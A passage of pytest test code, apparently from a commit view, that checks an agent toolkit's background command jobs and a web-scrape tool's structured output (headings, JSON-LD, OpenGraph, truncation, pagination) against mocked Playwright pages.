        assert result["success"] is True
        assert ticks >= 5, f"event loop looked blocked during subprocess (only {ticks} ticks in 1s)"

    async def test_background_job_start_poll_and_complete(
        self,
        execute_command_fn,
        bash_output_fn,
        mock_workspace,
        mock_secure_path,
    ):
        """A run_in_background job can be started, polled, and reports its exit status."""
        py_script = (
            "import time,sys;"
            "print('one');sys.stdout.flush();time.sleep(0.1);"
            "print('two');sys.stdout.flush();time.sleep(0.1);"
            "print('three')"
        )
        start_result = await execute_command_fn(
            command=f'"{sys.executable}" -c "{py_script}"',
            run_in_background=True,
            **mock_workspace,
        )
        assert start_result["background"] is True
        job_id = start_result["id"]
        # Fix: asyncio.get_event_loop() inside a coroutine is deprecated
        # (DeprecationWarning since 3.10/3.12); get_running_loop() is the
        # supported way to read the loop clock here.
        loop = asyncio.get_running_loop()
        deadline = loop.time() + 5.0
        seen_text = ""
        # Poll until the job reports an exit status, accumulating the streamed
        # stdout along the way (each poll may return only a partial chunk).
        while loop.time() < deadline:
            poll = await bash_output_fn(id=job_id, **mock_workspace)
            seen_text += poll["stdout"]
            if poll["status"].startswith("exited"):
                break
            await asyncio.sleep(0.05)
        assert "one" in seen_text
        assert "two" in seen_text
        assert "three" in seen_text
        assert poll["status"] == "exited(0)"

    async def test_background_job_kill(
        self,
        execute_command_fn,
        bash_output_fn,
        bash_kill_fn,
        mock_workspace,
        mock_secure_path,
    ):
        """bash_kill terminates a long-running background job."""
        start_result = await execute_command_fn(
            command="sleep 30",
            run_in_background=True,
            **mock_workspace,
        )
        job_id = start_result["id"]
        kill_result = await bash_kill_fn(id=job_id, **mock_workspace)
        assert kill_result["id"] == job_id
        assert "terminated" in kill_result["status"] or "killed" in kill_result["status"]
        # After a kill the job record is gone, so polling reports an unknown id.
        poll = await bash_output_fn(id=job_id, **mock_workspace)
        assert "no background job" in poll.get("error", "")

    async def test_bash_output_isolated_across_agents(self, execute_command_fn, bash_output_fn, mock_secure_path):
        """Agent A's job id is not reachable from agent B."""
        start = await execute_command_fn(
            command="sleep 5",
            run_in_background=True,
            agent_id="agent-A",
        )
        poll_b = await bash_output_fn(id=start["id"], agent_id="agent-B")
        assert "no background job" in poll_b.get("error", "")
        # Clean up agent A's still-running job so it does not leak into other tests.
        from aden_tools.tools.file_system_toolkits.execute_command_tool import background_jobs

        await background_jobs.clear_agent("agent-A")
+185 -1
View File
@@ -374,6 +374,188 @@ class TestWebScrapeToolLinkConversion:
assert len([t for t in texts if not t.strip()]) == 0
class TestWebScrapeToolAIFriendlyOutput:
    """Tests for the AI-friendly output additions: structured data,
    headings, page_type, block-level newlines, inline links, truncation
    metadata, and offset-based pagination."""

    # NOTE(review): _STEALTH_PATH, _PW_PATH, _make_playwright_mocks, and the
    # web_scrape_fn fixture are presumably defined earlier in this module —
    # confirm there. Each test patches Playwright and the stealth layer so no
    # real browser is launched; the mocked page serves the given HTML.

    @pytest.mark.asyncio
    @patch(_STEALTH_PATH)
    @patch(_PW_PATH)
    async def test_block_level_newlines_preserved(self, mock_pw, mock_stealth, web_scrape_fn):
        """Block elements (p, h1, li) produce newlines, not space-collapsed."""
        html = """
<html><body>
<h1>Title</h1>
<p>First paragraph.</p>
<p>Second paragraph.</p>
<ul><li>Item one</li><li>Item two</li></ul>
</body></html>
"""
        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
        mock_pw.return_value = mock_cm
        mock_stealth.return_value.apply_stealth_async = AsyncMock()
        result = await web_scrape_fn(url="https://example.com")
        assert "error" not in result
        content = result["content"]
        assert "Title" in content
        assert "First paragraph." in content
        assert "Second paragraph." in content
        # Block separation should produce newlines, not run paragraphs together
        assert "First paragraph.\n" in content or "First paragraph.\n\nSecond" in content
        assert "Item one" in content and "Item two" in content

    @pytest.mark.asyncio
    @patch(_STEALTH_PATH)
    @patch(_PW_PATH)
    async def test_headings_outline_returned(self, mock_pw, mock_stealth, web_scrape_fn):
        """Headings outline lists h1-h6 with level + text."""
        html = """
<html><body>
<h1>Top</h1>
<h2>Section A</h2>
<h3>Sub A1</h3>
</body></html>
"""
        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
        mock_pw.return_value = mock_cm
        mock_stealth.return_value.apply_stealth_async = AsyncMock()
        result = await web_scrape_fn(url="https://example.com")
        # Headings are returned in document order with their numeric level.
        assert result["headings"] == [
            {"level": 1, "text": "Top"},
            {"level": 2, "text": "Section A"},
            {"level": 3, "text": "Sub A1"},
        ]

    @pytest.mark.asyncio
    @patch(_STEALTH_PATH)
    @patch(_PW_PATH)
    async def test_inline_links_when_include_links(self, mock_pw, mock_stealth, web_scrape_fn):
        """include_links=True inlines anchors as [text](url) in content."""
        html = """
<html><body>
<p>See <a href="/docs">our docs</a> for details.</p>
</body></html>
"""
        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
        mock_pw.return_value = mock_cm
        mock_stealth.return_value.apply_stealth_async = AsyncMock()
        result = await web_scrape_fn(url="https://example.com", include_links=True)
        # Relative href is resolved against the final URL before inlining.
        assert "[our docs](https://example.com/docs)" in result["content"]
        # Separate links list still present for back-compat
        assert any(link["text"] == "our docs" for link in result["links"])

    @pytest.mark.asyncio
    @patch(_STEALTH_PATH)
    @patch(_PW_PATH)
    async def test_structured_data_json_ld(self, mock_pw, mock_stealth, web_scrape_fn):
        """JSON-LD blocks are parsed and surfaced under structured_data."""
        html = """
<html><head>
<script type="application/ld+json">
{"@type": "Article", "headline": "Hello"}
</script>
</head><body><p>body</p></body></html>
"""
        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
        mock_pw.return_value = mock_cm
        mock_stealth.return_value.apply_stealth_async = AsyncMock()
        result = await web_scrape_fn(url="https://example.com")
        assert "structured_data" in result
        # json_ld is a list: pages may carry multiple JSON-LD script blocks.
        assert result["structured_data"]["json_ld"] == [{"@type": "Article", "headline": "Hello"}]

    @pytest.mark.asyncio
    @patch(_STEALTH_PATH)
    @patch(_PW_PATH)
    async def test_structured_data_open_graph(self, mock_pw, mock_stealth, web_scrape_fn):
        """OpenGraph meta tags are surfaced under structured_data.open_graph."""
        html = """
<html><head>
<meta property="og:title" content="OG Title">
<meta property="og:type" content="article">
</head><body><p>body</p></body></html>
"""
        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
        mock_pw.return_value = mock_cm
        mock_stealth.return_value.apply_stealth_async = AsyncMock()
        result = await web_scrape_fn(url="https://example.com")
        # The "og:" prefix is stripped from the returned keys.
        assert result["structured_data"]["open_graph"] == {
            "title": "OG Title",
            "type": "article",
        }

    @pytest.mark.asyncio
    @patch(_STEALTH_PATH)
    @patch(_PW_PATH)
    async def test_truncation_metadata(self, mock_pw, mock_stealth, web_scrape_fn):
        """Truncated responses set truncated/total_length/next_offset."""
        html = f"<html><body>{'a' * 5000}</body></html>"
        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
        mock_pw.return_value = mock_cm
        mock_stealth.return_value.apply_stealth_async = AsyncMock()
        result = await web_scrape_fn(url="https://example.com", max_length=1000)
        # 5000 chars of extracted text, window of 1000 starting at offset 0.
        assert result["truncated"] is True
        assert result["total_length"] == 5000
        assert result["next_offset"] == 1000
        assert result["offset"] == 0

    @pytest.mark.asyncio
    @patch(_STEALTH_PATH)
    @patch(_PW_PATH)
    async def test_offset_pagination(self, mock_pw, mock_stealth, web_scrape_fn):
        """offset arg returns content starting from the given character."""
        body = "a" * 1000 + "b" * 1000 + "c" * 1000
        html = f"<html><body>{body}</body></html>"
        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
        mock_pw.return_value = mock_cm
        mock_stealth.return_value.apply_stealth_async = AsyncMock()
        result = await web_scrape_fn(url="https://example.com", max_length=1000, offset=1000)
        assert result["offset"] == 1000
        # Window should start in the b-region
        assert result["content"].startswith("b")
        assert result["truncated"] is True
        assert result["next_offset"] == 2000

    @pytest.mark.asyncio
    @patch(_STEALTH_PATH)
    @patch(_PW_PATH)
    async def test_page_type_listing(self, mock_pw, mock_stealth, web_scrape_fn):
        """3+ <article> elements => page_type 'listing'."""
        html = """
<html><body>
<article><h2>Post 1</h2></article>
<article><h2>Post 2</h2></article>
<article><h2>Post 3</h2></article>
</body></html>
"""
        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
        mock_pw.return_value = mock_cm
        mock_stealth.return_value.apply_stealth_async = AsyncMock()
        result = await web_scrape_fn(url="https://example.com")
        assert result["page_type"] == "listing"

    @pytest.mark.asyncio
    @patch(_STEALTH_PATH)
    @patch(_PW_PATH)
    async def test_page_type_article(self, mock_pw, mock_stealth, web_scrape_fn):
        """Single <article> => page_type 'article'."""
        html = "<html><body><article><p>Hello</p></article></body></html>"
        mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
        mock_pw.return_value = mock_cm
        mock_stealth.return_value.apply_stealth_async = AsyncMock()
        result = await web_scrape_fn(url="https://example.com")
        assert result["page_type"] == "article"
class TestWebScrapeToolErrorHandling:
"""Tests for error handling and early exit before JS wait."""
@@ -388,7 +570,9 @@ class TestWebScrapeToolErrorHandling:
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com/missing")
assert result == {"error": "HTTP 404: Failed to fetch URL"}
assert result["error"] == "HTTP 404: Failed to fetch URL"
assert result["status"] == 404
assert "hint" in result
mock_page.wait_for_load_state.assert_not_called()
@pytest.mark.asyncio